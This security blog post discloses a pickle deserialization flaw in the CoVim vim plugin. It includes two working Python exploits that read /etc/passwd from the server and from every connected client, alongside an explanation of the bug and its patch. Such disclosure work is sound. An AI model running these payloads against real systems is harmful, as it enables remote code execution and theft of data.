Exploiting CoVim

May 27 2013

Introducing CoVim

CoVim is a vim plugin allowing for collaborative edition of text documents. Something like Etherpad-lite, but directly integrated in vim. Sounds cool.

The architecture is simple: one can run the Twisted server on any machine, and the vim plugin also runs Twisted code to connect to it. So the usual client-server architecture, all in Python (your must use a version of vim compiled for Python support).

I think that Covim has several problems which need to be solved before reaching a mature state. In this blog post, I am focusing on one particular issue that I found by looking at the source code a few days after the project has been announced.

Pickle fights back

The protocol is quite simple: except for the first message sent by the client to connect with its nickname, all messages are dictionaries previously serialised with pickle.

Sure, this is a problem in terms of useless overhead in all packet messages. But most importantly, this is a severe security flaw, that I have already exploited in one challenge of iCTF 2013.

What does it means? It means that an attacker can run arbitrary code on either the server or the client, depending on the party controlled by the attacker. And as we will see later, it is even possible to exploits all the clients connected to a server by connecting to that server as well.

Exploit as seen by a client

Eploits in that article have been tested on the version 2e8006f of CoVim. I reported that security flaw, and my patch was merged into the master branch at 2189404.

Exploiting the server

The idea here is simple: as the server directly loads some data that we sent, we can just craft a specific payload. That being said, we probably want to get some result back. Instead of creating a listening socket on the server, or making it connect back to us, why not use the TCP connection we already have?

Since the code uses pickle and not cPickle, it is not that simple, because self does not refer to the Protocol subclass, so we can not directly access its transport.write method. A way around that is just to import the garbage collector class, and look for all instances of objects that subclass the Protocol class! This is what the string in the prototype variable is doing.

Exploiting the server

But then, if we directly send the information we are looking for (like the content of the /etc/passwd file), all legitimate clients connected to the server will crash because they will receive that payload as well, and try to unpickle it. The idea here is to create a legitimate payload (i.e. a pickled dictionary) adding the information we are looking for under an unused key, so that the regular clients will just ignore it.

The rest of the exploit is just sending that crafted payload to the server, and listening to what is sent back. Of course, we don't want to unpickle those messages ourselves, so I just used a basic REGEX to look for strings.

import socket
import time
import re

# config: ip and port the server
ip, port = '192.168.56.1', 12345

# exploiting pickle loads
prototype = "c__builtin__\neval\np1\n"\
    "(S'{'a':[o.transport.write(%s) for o "\
    "in __import__('gc').get_objects() if isinstance(o,"\
    "self.find_class('twisted.internet.protocol','Protocol'))],"\
    "'data':{}}'"\
    "\np1\ntp2\nRp3\n."
server_exploit = prototype % (
    "__import__('pickle').dumps({'data':{},"\
    "'exploit':''.join(open('/etc/passwd').readlines()).encode('hex')})")

# connects to the server
sock = socket.socket()
sock.connect((ip, port))
sock.send('attacker') # beautiful nickname
time.sleep(1) # just to be sure
sock.send(server_exploit)
sockf = sock.makefile()
# going though the message we receive, looking for the string "exploit"
key = None
while True:
    line = sockf.readline()[:-1]
    # yes, we don't use pickle to read those messages ;-)
    s = re.search(r"S'(.*)'", line)
    if s is not None:
        value = s.groups()[0]
        if key == 'exploit':
            print value.decode('hex')
            break
        key = value
sock.close()

Exploiting all clients connected to a server

This time, we want to exploit the server in such a way that it sends a crafted payload to all clients connected to him. Then, those exploited clients will send back the result of the exploit to the server, which will transfer it to the attacker (the server happily broadcasts quite everything it receives, so nothing tricky here).

We are simply going to enclose an exploit in an exploit, like the Matryoshka dolls.

Exploiting all clients

We would also like to gather the nicknames of all clients as well as their IP addresses. For the IP address, the best idea is to take the one seen by the server, as it will avoid collecting local IP addresses of hosts behind a NAT.

Apart from that, since the source code of the clients is really similar to the one of the servers, the exploit looks really similar to the previous one. There is just some encapsulation of the crafted payloads. I've limited the number of lines of /etc/passwd to be sent for the sake of the above screenshot.

import socket
import time
import re

# config: ip and port the server
ip, port = '192.168.56.1', 12345

# exploiting pickle loads
prototype = "c__builtin__\neval\np1\n"\
    "(S'{'a':[o.transport.write(%s) for o "\
    "in __import__('gc').get_objects() if isinstance(o,"\
    "self.find_class('twisted.internet.protocol','Protocol'))],"\
    "'data':{}}'"\
    "\np1\ntp2\nRp3\n."
client_exploit = prototype % ("__import__('pickle').dumps({'data':{},"\
    "'exploit':('%s#%s#%s'%("\
    # nickname, placeholder, interesting data
    "o.fact.me,'####',''.join(open('/etc/passwd').readlines()[-8:])))."\
    "encode('hex')})")
server_exploit = prototype % ("'%s'.decode('hex').replace('####'," \
    "o.transport.getPeer().host)" \
    % client_exploit.encode('hex'))

# connects to the server
sock = socket.socket()
sock.connect((ip, port))
sock.send('attacker') # beautiful nickname
time.sleep(1) # just to be sure
sock.send(server_exploit)
sockf = sock.makefile()
# going though the message we receive, looking for the string "exploit"
key = None
while True:
    line = sockf.readline()[:-1]
    # yes, we don't use pickle to read those messages ;-)
    s = re.search(r"S'(.*)'", line)
    if s is not None:
        value = s.groups()[0]
        if key == 'exploit':
            print '>' * 40
            print ('\n%s\n' % ('-' * 40)).join(
                    value.decode('hex').split('#'))
            print '<' * 40
        key = value

Conclusion

This exploits are run against a protocol fully based on pickle, meaning that both the client and server were vulnerable. I showed that with some work, one can exploit all clients connected to the server, just by exploiting that server.

Even if my exploits were only getting the content of the /etc/passwd file, unsafe use of pickle do allow for arbitrary code execution. Indeed, the attacker can load any module; for example, my attack used the garbage collector module in order to get all instances of a particular class. But really, the possibilities are limitless.

To conclude, let me say one more time that pickle is not to be used to load untrusted data. This is highlighted in the documentation, and was already my conclusion of a previous article. However, that was probably not enough, as the author of CoVim wrote (emphasis is mine):

We actually were using json instead of pickle initially, but switched because json encoded strings to unicode, while pickle didn't. I didn't know there were security issues involved, i'll look into changing it back.

This means that mentioning it in the documentation is not enough. What can be done to enforce a proper use of pickle? Do not load automatically what was supposed to be defined by a __reduce__ method? Rename the load and loads methods into a more verbose load_but_insecure_if_not_trusted_input? This is an open question whose answer is very likely to break compatibility. Which means that we will continue to find this vulnerability inside new programs in the foreseeable future.